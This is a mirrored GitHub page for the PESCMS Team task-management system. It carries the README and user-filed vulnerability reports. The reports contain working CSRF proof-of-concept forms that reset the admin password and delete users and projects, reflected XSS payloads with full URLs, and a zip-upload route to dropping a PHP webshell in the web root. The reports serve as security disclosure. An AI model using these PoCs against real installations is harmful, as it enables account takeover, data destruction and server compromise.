GithubHelp home page GithubHelp logo

lazyphp / pescms-team Goto Github PK

View Code? Open in Web Editor NEW
83.0 13.0 36.0 16.11 MB

The open source task management system

License: GNU General Public License v2.0

PHP 19.28% CSS 19.80% JavaScript 58.29% HTML 2.19% Hack 0.05% Less 0.39%

pescms-team's Introduction

PESCMS Team 团队任务管理系统

mahua mahua
PESCMS TEAM是一款以GPLv2协议进行开源的团队任务管理系统
The open source task management system
PESCMS官方QQ 1群:451828934 PESCMS官方1群
PESCMS官方QQ 2群:496804032 PESCMS官方2群
演示地址:http://team.pescms.com

环境要求

PHP 7.0或以上且需要安装PDO扩展、GD库
MYSQL 5.5或以上

PESCMS TEAM特色

1.兼容PC端和移动端 ,实测PC端支持:IE8+、Chrome、Firefox、Safari…… 移动端支持 安卓和苹果系统。
2.强大而简单得任务分配指派功能,让任务管理变得更加简单和实用。
3.丰富的操作和开发文档,让二次开发变得更加简单和友好!

安装使用

  • 下载并解压程序至您的HTTP运行环境所在目录。
  • 没有配置虚拟主机,则访问Public目录。反之,请将虚拟主机目录配置到Public
  • 根据安装程序填写对应数据,完成软件安装。

反馈和建议

邮箱:sale#pescms.com
官方网站:https://www.pescms.com/
演示地址:https://team.pescms.com
开发文档:https://document.pescms.com/article/5.html
操作文档:https://document.pescms.com/article/2.html

pescms-team's People

Contributors

lazyphp avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

pescms-team's Issues

There are some vulnerabilities in cms.

Cross Site Request Forgery(CSRF)-1

modify admin's password ,mail,phone and head-image.

Technical Description:
file :
pescms/App/Team/PUT/User.php

The function of this file is to Modify personal information,but it don't Verify whether the operation is legal.
Through it attackers can modify admin's password ,mail,phone and head-image.

Proof of Concept(PoC)

  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/pescms/Public/?g=Team&m=User&a=setting" method="POST">
      <input type="hidden" name="method" value="PUT" />
      <input type="hidden" name="name" value="admin" />
      <input type="hidden" name="mail" value="123456&#64;qq&#46;com" />
      <input type="hidden" name="phone" value="" />
      <input type="hidden" name="password" value="newadmin" />
      <input type="hidden" name="home" value="Team&#45;Index&#45;index" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

1

Success.And the password of admin has been modify.
2

Cross Site Request Forgery(CSRF)-2

Delete the administrator and other member's account number

Technical Description:
file:

pescms/App/Team/DELETE/Content.php
pescms/App/Team/DELETE/Field.php  

Throught it can delete Any member and administrator just by modify the 'id' that in Url.
Delete the Account number of administrator just need to modify the id as '1'.
3

Proof of Concept(PoC)

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/pescms/Public/?g=Team&m=User&a=action&id=36&method=DELETE&back_url=L3Blc2Ntcy9QdWJsaWMvP2c9VGVhbSZtPVVzZXImYT1pbmRleA==" method="POST">
      <input type="hidden" name="" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Visit this page of poc:
4
5

We refresh the list of user ,that find that the user that called light is deleted.
6

Cross Site Request Forgery(CSRF)-3

Delete import information

Technical Description:
file:

pescms/App/Team/DELETE/Attachment.php
pescms/App/Team/DELETE/Content.php
pescms/App/Team/DELETE/Field.php
pescms/App/Team/DELETE/Model.php
pescms/App/Team/DELETE/Notice.php

Through CSRF to Delete important data is exist in these files.

ALL the delete operations are not verify in front page. Like this:
7

Proof of Concept(PoC)

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/pescms/Public/?g=Team&m=Project&a=action&id=1&method=DELETE&back_url=L3Blc2Ntcy9QdWJsaWMvP2c9VGVhbSZtPVByb2plY3QmYT1pbmRleA==" method="POST">
      <input type="hidden" name="" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

8
refresh:
9

And other operations of delete are exist on this cms. Just give the positions,don't prove.
10
11

Reflected XSS in App/Team/GET/Repoort.php

In the method of extract, the CSRF also exist , but this is to prove the Rdflected XSS,not CSRF.

In line 72-78 , the data from $_GET('begin') and $_GET('end') is transfer to variables, and output in pages.
12

Proof of Concept(PoC)

localhost/pescms/Public/?g=Team&m=Report&a=extract&begin="onmouseover=alert(1)//&end=&user=0
or 
localhost/pescms/Public/?g=Team&m=Report&a=extract&begin=&end="onmouseover=alert(1)//&user=0
or,page:
http://localhost/pescms/Public/?g=Team&m=Report&a=allExtract&begin="onmouseover=alert(1)//&end=&user=0  

13

In this page ,Reflected XSS can be combined with CSRF,this will cause bigger destruction

PECSM-TEAM 2.2.2 has a file upload vulnerability in /Public/?g=Team&m=Setting&a=upgrade

This page let user upgrade the PESCMS system manually.
default

Follow the mtUpgrade funtction,the upload file extension must be “zip”
default

and follow the unzip function
default

Follow the simulateInstall function and install function,we can see the file decompression in root directory
default
default

so,we can create a evil.php
default

and compression it as evil.zip,and upload the evil.zip,
default

at last ,the system decompress evil.zip and evil.php in root directory.
default

English language

Hello,

would you be able to translate PESCMS into english language ? It would be great, as it seems like wonderful project !

PECSM-TEAM 2.2.2 has multiple reflected Cross Site Scripting Vulnerability

I found multiple reflected cross site scripting vulnerability where the page use Model_index.php ,we can see where is no XSS filter in "keyword" parameter.
clipboard
now I input payload :aa">< img src=x onerror=alert(1)>
the full url is :http://127.0.0.1/Public/?g=Team&m=User&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E

and the code is running
clipbzoard

and there are lots of pages use Model_index.php,and they all have reflected cross site scripting vulnerability.Like:

http://127.0.0.1/Public/?g=Team&m=User&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E

http://127.0.0.1/Public/?g=Team&m=User_group&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E

http://127.0.0.1/Public/?g=Team&m=Department&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E

http://127.0.0.1/Public/?g=Team&m=Bulletin&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E

..
..
..

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.